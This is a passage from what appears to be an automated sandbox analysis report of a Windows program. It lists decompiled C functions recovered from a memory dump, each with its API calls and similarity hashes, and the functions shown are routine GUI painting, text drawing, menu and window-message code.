                                  					_t153 =  *((char*)(_v16 + 1));
                                  					if(_t153 != 0) {
                                  						goto L12;
                                  					}
                                  					goto L11;
                                  				}
                                  			}

                                  APIs
                                  • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00457D0B
                                  • OffsetRect.USER32 ref: 00457D5C
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00457D91
                                  • OffsetRect.USER32 ref: 00457D9E
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00457E05
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Draw$OffsetRectText$Edge
                                  • String ID:
                                  • API String ID: 3610532707-0
                                  • Opcode ID: 2c86f3ea0eed03be7b2d349a793995695e907d3c5b545792c38e0820bd8b037e
                                  • Instruction ID: 86bd18e6a062903fba8e44786a069064b20b7474a81349754dbda688cf155458
                                  • Opcode Fuzzy Hash: 2c86f3ea0eed03be7b2d349a793995695e907d3c5b545792c38e0820bd8b037e
                                  • Instruction Fuzzy Hash: E151A370A08208AFDB11EFA9D882B9E77E5AF45315F5485BAFD14E7382C73CAD048719
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0044B244(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				int _v16;
                                  				int _v20;
                                  				struct tagPAINTSTRUCT _v84;
                                  				intOrPtr _t55;
                                  				void* _t64;
                                  				struct HDC__* _t75;
                                  				void* _t76;
                                  				intOrPtr _t85;
                                  				void* _t96;
                                  				void* _t97;
                                  				void* _t99;
                                  				void* _t101;
                                  				void* _t102;
                                  				intOrPtr _t103;
                                  
                                  				_t101 = _t102;
                                  				_t103 = _t102 + 0xffffffb0;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t75 =  *(_v12 + 4);
                                  				if(_t75 == 0) {
                                  					_t75 = BeginPaint(E0044D590(_v8),  &_v84);
                                  				}
                                  				_push(_t101);
                                  				_push(0x44b364);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t103;
                                  				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                                  					_v20 = SaveDC(_t75);
                                  					_v16 = 2;
                                  					_t96 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                                  					if(_t96 >= 0) {
                                  						_t97 = _t96 + 1;
                                  						_t99 = 0;
                                  						do {
                                  							_t64 = E0041C834( *((intOrPtr*)(_v8 + 0x198)), _t76, _t99);
                                  							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                                  								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                                  									goto L11;
                                  								} else {
                                  									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                                  									if(_v16 != 1) {
                                  										goto L11;
                                  									}
                                  								}
                                  							} else {
                                  								goto L11;
                                  							}
                                  							goto L12;
                                  							L11:
                                  							_t99 = _t99 + 1;
                                  							_t97 = _t97 - 1;
                                  						} while (_t97 != 0);
                                  					}
                                  					L12:
                                  					if(_v16 != 1) {
                                  						 *((intOrPtr*)( *_v8 + 0xb8))();
                                  					}
                                  					RestoreDC(_t75, _v20);
                                  				} else {
                                  					 *((intOrPtr*)( *_v8 + 0xb8))();
                                  				}
                                  				E0044B39C(_v8, 0, _t75);
                                  				_pop(_t85);
                                  				 *[fs:eax] = _t85;
                                  				_push(0x44b36b);
                                  				_t55 = _v12;
                                  				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                                  					return EndPaint(E0044D590(_v8),  &_v84);
                                  				}
                                  				return _t55;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                  • String ID:
                                  • API String ID: 3808407030-0
                                  • Opcode ID: 02da60cef51731c1bc855ae6051b7a586c728650794ebafa3fb79d1c437d0a0e
                                  • Instruction ID: 2776488e99df057887c77d368e8bf2338f9b3d40826eb1038a8dff78df5d4c9a
                                  • Opcode Fuzzy Hash: 02da60cef51731c1bc855ae6051b7a586c728650794ebafa3fb79d1c437d0a0e
                                  • Instruction Fuzzy Hash: 0B414A70A00604AFDB10DF9AC885AAEB7F9FF48304F1584AAE90497266D778DD40CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0046AA24(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
                                  				struct tagRECT _v20;
                                  				void* __edi;
                                  				void* __ebp;
                                  				int _t17;
                                  				CHAR* _t19;
                                  				int _t31;
                                  				CHAR* _t33;
                                  				int _t43;
                                  				CHAR* _t45;
                                  				void* _t49;
                                  				signed int _t56;
                                  				int _t57;
                                  				void* _t61;
                                  
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t60 = __ecx;
                                  				_t49 = __edx;
                                  				_t56 = _a4;
                                  				E00428D80( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
                                  				if(_a8 != 1) {
                                  					_t57 = _t56 | 0x00000005;
                                  					__eflags = _t57;
                                  					_t17 = E00404698(__ecx);
                                  					_t19 = E00404898(__ecx);
                                  					return DrawTextA(E004294DC(_t49), _t19, _t17,  &_v20, _t57);
                                  				}
                                  				OffsetRect( &_v20, 1, 1);
                                  				E00428490( *((intOrPtr*)(_t49 + 0xc)), 0xff000014);
                                  				_t31 = E00404698(_t60);
                                  				_t33 = E00404898(_t60);
                                  				DrawTextA(E004294DC(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
                                  				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
                                  				E00428490( *((intOrPtr*)(_t49 + 0xc)), 0xff000010);
                                  				_t43 = E00404698(_t60);
                                  				_t45 = E00404898(_t60);
                                  				return DrawTextA(E004294DC(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
                                  			}

                                  APIs
                                  • OffsetRect.USER32 ref: 0046AA5A
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046AA8E
                                  • OffsetRect.USER32 ref: 0046AA9B
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046AACD
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046AAF4
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: DrawText$OffsetRect
                                  • String ID:
                                  • API String ID: 1886049697-0
                                  • Opcode ID: d26dd655861490adfebdf5d0fa9ac4577962b128cdfa5938044a2aef71de8541
                                  • Instruction ID: 7793d4d47d01da271cade7b470186595b11da03caba15a77c1a9b6a2e69502f2
                                  • Opcode Fuzzy Hash: d26dd655861490adfebdf5d0fa9ac4577962b128cdfa5938044a2aef71de8541
                                  • Instruction Fuzzy Hash: 1321A4B1B045256BCB00FAAA9C4199F739C5F45318B054A2BB918F7282EA7DED01876D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00439888(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				long _t27;
                                  				long _t34;
                                  				int _t42;
                                  				int _t43;
                                  				intOrPtr _t50;
                                  				int _t54;
                                  				void* _t57;
                                  				void* _t60;
                                  
                                  				_v12 = 0;
                                  				_v8 = __ecx;
                                  				_t54 = __edx;
                                  				_t57 = __eax;
                                  				_push(_t60);
                                  				_push(0x439973);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t60 + 0xfffffff8;
                                  				if(__edx >= 0) {
                                  					_t42 = SendMessageA(E0044D590( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
                                  					if(_t42 < 0) {
                                  						_t43 = SendMessageA(E0044D590( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
                                  						if(_t43 >= 0) {
                                  							_t27 = SendMessageA(E0044D590( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
                                  							if(_t27 != 0) {
                                  								_t42 = _t43 + _t27;
                                  								E004046E4( &_v12, _v8, 0x43998c);
                                  								goto L6;
                                  							}
                                  						}
                                  					} else {
                                  						E004046E4( &_v12, 0x43998c, _v8);
                                  						L6:
                                  						SendMessageA(E0044D590( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42);
                                  						_t34 = E00404898(_v12);
                                  						SendMessageA(E0044D590( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34);
                                  					}
                                  				}
                                  				_pop(_t50);
                                  				 *[fs:eax] = _t50;
                                  				_push(0x43997a);
                                  				return E004043D8( &_v12);
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 52b2a5598674da164ebaf056403b39049885dbd175adf6d87f8b2696323507a8
                                  • Instruction ID: 61d0a38cf5ad884e31ac5b3a13015c4b603a4644f92994f135f47ebb2aefbb30
                                  • Opcode Fuzzy Hash: 52b2a5598674da164ebaf056403b39049885dbd175adf6d87f8b2696323507a8
                                  • Instruction Fuzzy Hash: 25213371B047446BE710EA669C82F5B76A8EF49708F10487E7905E72C1DBB9AD00C619
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0048AD8C(intOrPtr __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                  				intOrPtr _v8;
                                  				struct HDC__* _v12;
                                  				void* __ebp;
                                  				intOrPtr _t35;
                                  				intOrPtr _t75;
                                  				void* _t81;
                                  				void* _t83;
                                  				intOrPtr _t84;
                                  
                                  				_t81 = _t83;
                                  				_t84 = _t83 + 0xffffffe8;
                                  				_v8 = __eax;
                                  				E0044CF7C(_v8, __ecx, __edx, _a4, _a8);
                                  				_t35 = _v8;
                                  				if( *((char*)(_t35 + 0x57)) != 0) {
                                  					return _t35;
                                  				} else {
                                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x230)))) + 0x40))();
                                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x230)))) + 0x34))();
                                  					_v12 = GetDC(GetDesktopWindow());
                                  					_push(_t81);
                                  					_push(0x48ae58);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t84;
                                  					BitBlt(E004294DC(E0042D8BC( *((intOrPtr*)(_v8 + 0x230)))), 0, 0,  *(_v8 + 0x48),  *(_v8 + 0x4c), _v12,  *(_v8 + 0x40),  *(_v8 + 0x44), 0xcc0020);
                                  					_pop(_t75);
                                  					 *[fs:eax] = _t75;
                                  					_push(0x48ae5f);
                                  					return ReleaseDC(GetDesktopWindow(), _v12);
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 0044CF7C: IsIconic.USER32(?), ref: 0044CFBB
                                    • Part of subcall function 0044CF7C: SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044CFD9
                                  • GetDesktopWindow.USER32 ref: 0048ADDD
                                  • GetDC.USER32(00000000), ref: 0048ADE3
                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0048AE36
                                  • GetDesktopWindow.USER32 ref: 0048AE4C
                                  • ReleaseDC.USER32(00000000,?), ref: 0048AE52
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Window$Desktop$IconicRelease
                                  • String ID:
                                  • API String ID: 1424704201-0
                                  • Opcode ID: 1b0901c27eb55661872896334790a30d39a55c007051c2436a9fc4a1600690c9
                                  • Instruction ID: e77e1c3257bb93591b772a3682644900c9db5e1c0b88c139c983b2afcaad11cc
                                  • Opcode Fuzzy Hash: 1b0901c27eb55661872896334790a30d39a55c007051c2436a9fc4a1600690c9
                                  • Instruction Fuzzy Hash: 8A21F775A04204EFDB00EF99C995E9EBBF8EF09310F1140A6F904EB352D635AE00DB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00457A7C(int __eax, void* __edx) {
                                  				signed int _t39;
                                  				signed int _t40;
                                  				intOrPtr _t44;
                                  				int _t46;
                                  				int _t47;
                                  				intOrPtr* _t48;
                                  
                                  				_t18 = __eax;
                                  				_t48 = __eax;
                                  				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                  					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                  						 *((char*)(__eax + 0x74)) = 1;
                                  						return __eax;
                                  					}
                                  					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                  					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                  						return E00457A7C(_t19, __edx);
                                  					}
                                  					_t18 = GetMenuItemCount(E00457BAC(__eax));
                                  					_t47 = _t18;
                                  					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                                  					while(_t47 > 0) {
                                  						_t46 = _t47 - 1;
                                  						_t18 = GetMenuState(E00457BAC(_t48), _t46, 0x400);
                                  						if((_t18 & 0x00000004) == 0) {
                                  							_t18 = RemoveMenu(E00457BAC(_t48), _t46, 0x400);
                                  							_t40 = 1;
                                  						}
                                  						_t47 = _t47 - 1;
                                  					}
                                  					if(_t40 != 0) {
                                  						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                                  							L14:
                                  							E0045793C(_t48);
                                  							L15:
                                  							return  *((intOrPtr*)( *_t48 + 0x3c))();
                                  						}
                                  						_t44 =  *0x456590; // 0x4565dc
                                  						if(E004037A4( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E00457BAC(_t48)) != 0) {
                                  							goto L14;
                                  						} else {
                                  							DestroyMenu( *(_t48 + 0x34));
                                  							 *(_t48 + 0x34) = 0;
                                  							goto L15;
                                  						}
                                  					}
                                  				}
                                  				return _t18;
                                  			}

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8e12cad267ee74e1320e98af3d2473b4d83076ed945f06cdfac160a6804a0f98
                                  • Instruction ID: 66c08ce3c6f31a992588c91cdbf30887e5f254a92de57971e36fdfe0368b16d7
                                  • Opcode Fuzzy Hash: 8e12cad267ee74e1320e98af3d2473b4d83076ed945f06cdfac160a6804a0f98
                                  • Instruction Fuzzy Hash: 04119321A486095ADB60BE3BAC05B5B76995F4170EF04013BBD00AB383CA7CED4D82AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 22%
                                  			E0044EF5C(void* __eax, void* __ecx) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				intOrPtr* _t14;
                                  				intOrPtr* _t17;
                                  				intOrPtr _t19;
                                  				intOrPtr* _t21;
                                  				intOrPtr* _t26;
                                  				intOrPtr _t37;
                                  				void* _t39;
                                  				intOrPtr _t48;
                                  				void* _t50;
                                  				void* _t52;
                                  				intOrPtr _t53;
                                  
                                  				_t50 = _t52;
                                  				_t53 = _t52 + 0xfffffff4;
                                  				_t39 = __eax;
                                  				if( *((short*)(__eax + 0x68)) == 0xffff) {
                                  					return __eax;
                                  				} else {
                                  					_t14 =  *0x4bae68; // 0x4bc904
                                  					_t17 =  *0x4bae68; // 0x4bc904
                                  					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                                  					_push(_t19);
                                  					L0042FCB4();
                                  					_v8 = _t19;
                                  					_push(_t50);
                                  					_push(0x44f01c);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t53;
                                  					_t21 =  *0x4bb224; // 0x4bcb80
                                  					E0042FCF4(_v8, E004653CC( *_t21, __ecx,  *((short*)(__eax + 0x68))));
                                  					_t26 =  *0x4bb224; // 0x4bcb80
                                  					E0042FCF4(_v8, E004653CC( *_t26, __ecx,  *((short*)(_t39 + 0x68))));
                                  					_push(0);
                                  					_push(0);
                                  					_push(0);
                                  					_push(_v8);
                                  					L0042FD48();
                                  					_push( &_v16);
                                  					_push(0);
                                  					L0042FD58();
                                  					_push(_v12);
                                  					_push(_v16);
                                  					_push(1);
                                  					_push(_v8);
                                  					L0042FD48();
                                  					_pop(_t48);
                                  					 *[fs:eax] = _t48;
                                  					_push(0x44f023);
                                  					_t37 = _v8;
                                  					_push(_t37);
                                  					L0042FCBC();
                                  					return _t37;
                                  				}
                                  			}


















                                  APIs
                                  • 73F0908C.COMCTL32(00000000), ref: 0044EF8E
                                    • Part of subcall function 0042FCF4: 73F66EE7.COMCTL32(00444DB6,000000FF,00000000,0044EFBE,00000000,0044F01C,?,00000000), ref: 0042FCF8
                                  • 73F66C88.COMCTL32(00444DB6,00000000,00000000,00000000,00000000,0044F01C,?,00000000), ref: 0044EFE2
                                  • 73F66CDC.COMCTL32(00000000,?,00444DB6,00000000,00000000,00000000,00000000,0044F01C,?,00000000), ref: 0044EFED
                                  • 73F66C88.COMCTL32(00444DB6,00000001,?,0044F085,00000000,?,00444DB6,00000000,00000000,00000000,00000000,0044F01C,?,00000000), ref: 0044F000
                                  • 73F07CF1.COMCTL32(00444DB6,0044F023,0044F085,00000000,?,00444DB6,00000000,00000000,00000000,00000000,0044F01C,?,00000000), ref: 0044F016
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: F0908
                                  • String ID:
                                  • API String ID: 1027928615-0
                                  • Opcode ID: 0a05ad87dd09bc56209d99443117f197f5e9e84a0d2bab8f350996b43cc7c6d9
                                  • Instruction ID: 35e99998dc3e0a2ffff22f2567d4dd5ee2700d8fc3202683d2053a11a76ffa59
                                  • Opcode Fuzzy Hash: 0a05ad87dd09bc56209d99443117f197f5e9e84a0d2bab8f350996b43cc7c6d9
                                  • Instruction Fuzzy Hash: FE218135740304AFEB10EBA9DC82F6D73F8EB49704F9004B6B910DB291DAB5AD44CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00467060(void* __eax, void* __ecx, struct HWND__** __edx) {
                                  				intOrPtr _t11;
                                  				intOrPtr _t20;
                                  				void* _t30;
                                  				void* _t31;
                                  				void* _t33;
                                  				struct HWND__** _t34;
                                  				struct HWND__* _t35;
                                  				struct HWND__* _t36;
                                  
                                  				_t31 = __ecx;
                                  				_t34 = __edx;
                                  				_t33 = __eax;
                                  				_t30 = 0;
                                  				_t11 =  *((intOrPtr*)(__edx + 4));
                                  				if(_t11 < 0x100 || _t11 > 0x108) {
                                  					L16:
                                  					return _t30;
                                  				} else {
                                  					_t35 = GetCapture();
                                  					if(_t35 != 0) {
                                  						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x4bc668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                  							_t30 = 1;
                                  						}
                                  						goto L16;
                                  					}
                                  					_t36 =  *_t34;
                                  					_t2 = _t33 + 0x44; // 0x0
                                  					_t20 =  *_t2;
                                  					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
                                  						L7:
                                  						if(E00443B88(_t36, _t31) == 0 && _t36 != 0) {
                                  							_t36 = GetParent(_t36);
                                  							goto L7;
                                  						}
                                  						if(_t36 == 0) {
                                  							_t36 =  *_t34;
                                  						}
                                  						goto L11;
                                  					} else {
                                  						_t36 = E0044D590(_t20);
                                  						L11:
                                  						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                  							_t30 = 1;
                                  						}
                                  						goto L16;
                                  					}
                                  				}
                                  			}












                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: MessageSend$CaptureLongWindow
                                  • String ID:
                                  • API String ID: 1158686931-0
                                  • Opcode ID: 10c289f50b82a2cb95b14777d12c040b3c483e201a65ddf1aa22a0736d1b4b50
                                  • Instruction ID: 9ed5478cb85dccc1fdacaa70bbac843085878d57661c3dc1fa15297e2471934d
                                  • Opcode Fuzzy Hash: 10c289f50b82a2cb95b14777d12c040b3c483e201a65ddf1aa22a0736d1b4b50
                                  • Instruction Fuzzy Hash: 09117C713086095FE660EA598D81A53B3DC9B29358B10483BFD59C7343FA69FC40877A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042DC68(int __eax) {
                                  				int _t21;
                                  				signed int _t29;
                                  				char _t34;
                                  				int _t42;
                                  				int _t43;
                                  				struct HDC__* _t44;
                                  				intOrPtr _t45;
                                  
                                  				_t21 = __eax;
                                  				_t42 = __eax;
                                  				_t45 =  *((intOrPtr*)(__eax + 0x28));
                                  				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
                                  					_t22 =  *((intOrPtr*)(_t45 + 0x14));
                                  					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
                                  						E0042C5D4(_t22);
                                  					}
                                  					_t21 = E00429FD0( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
                                  					_t43 = _t21;
                                  					 *(_t45 + 0x10) = _t43;
                                  					if(_t43 == 0) {
                                  						_t44 = E004298D4(GetDC(0));
                                  						if( *((char*)(_t45 + 0x71)) != 0) {
                                  							L9:
                                  							_t34 = 1;
                                  						} else {
                                  							_t29 = GetDeviceCaps(_t44, 0xc);
                                  							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
                                  								goto L9;
                                  							} else {
                                  								_t34 = 0;
                                  							}
                                  						}
                                  						 *((char*)(_t45 + 0x71)) = _t34;
                                  						if(_t34 != 0) {
                                  							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
                                  						}
                                  						_t21 = ReleaseDC(0, _t44);
                                  						if( *(_t45 + 0x10) == 0) {
                                  							 *((char*)(_t42 + 0x30)) = 1;
                                  							return _t21;
                                  						}
                                  					}
                                  				}
                                  				return _t21;
                                  			}











                                  APIs
                                  • GetDC.USER32(00000000), ref: 0042DCBE
                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042DCD3
                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042DCDD
                                  • CreateHalftonePalette.GDI32(00000000), ref: 0042DD01
                                  • ReleaseDC.USER32(00000000,00000000), ref: 0042DD0C
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CapsDevice$CreateHalftonePaletteRelease
                                  • String ID:
                                  • API String ID: 2404249990-0
                                  • Opcode ID: e5dd97116162e55957adf1c9b33213b73bdfa514209594ef851dd4e65cec3bd4
                                  • Instruction ID: cb91f00d1bb0f312b2eec9ff1cece74945c0493f8764cf7b3fe5b1e156172a6d
                                  • Opcode Fuzzy Hash: e5dd97116162e55957adf1c9b33213b73bdfa514209594ef851dd4e65cec3bd4
                                  • Instruction Fuzzy Hash: 6C11B421B456A99ADB20EF26E8417EF3691AF16315F45012BFC009B2C1D7B8DC90C3A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00464608(void* __eax) {
                                  				void* _t16;
                                  				void* _t39;
                                  				signed int _t42;
                                  
                                  				_t16 = __eax;
                                  				_t39 = __eax;
                                  				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x4a0f30 != 0) {
                                  					_t16 = E0044D894(__eax);
                                  					if(_t16 != 0) {
                                  						_t42 = GetWindowLongA(E0044D590(_t39), 0xffffffec);
                                  						if( *((char*)(_t39 + 0x2e0)) != 0 ||  *((char*)(_t39 + 0x2e8)) != 0) {
                                  							if((_t42 & 0x00080000) == 0) {
                                  								SetWindowLongA(E0044D590(_t39), 0xffffffec, _t42 | 0x00080000);
                                  							}
                                  							return  *0x4a0f30(E0044D590(_t39),  *((intOrPtr*)(_t39 + 0x2ec)),  *((intOrPtr*)(_t39 + 0x2e1)),  *0x004A0FB4 |  *0x004A0FBC);
                                  						} else {
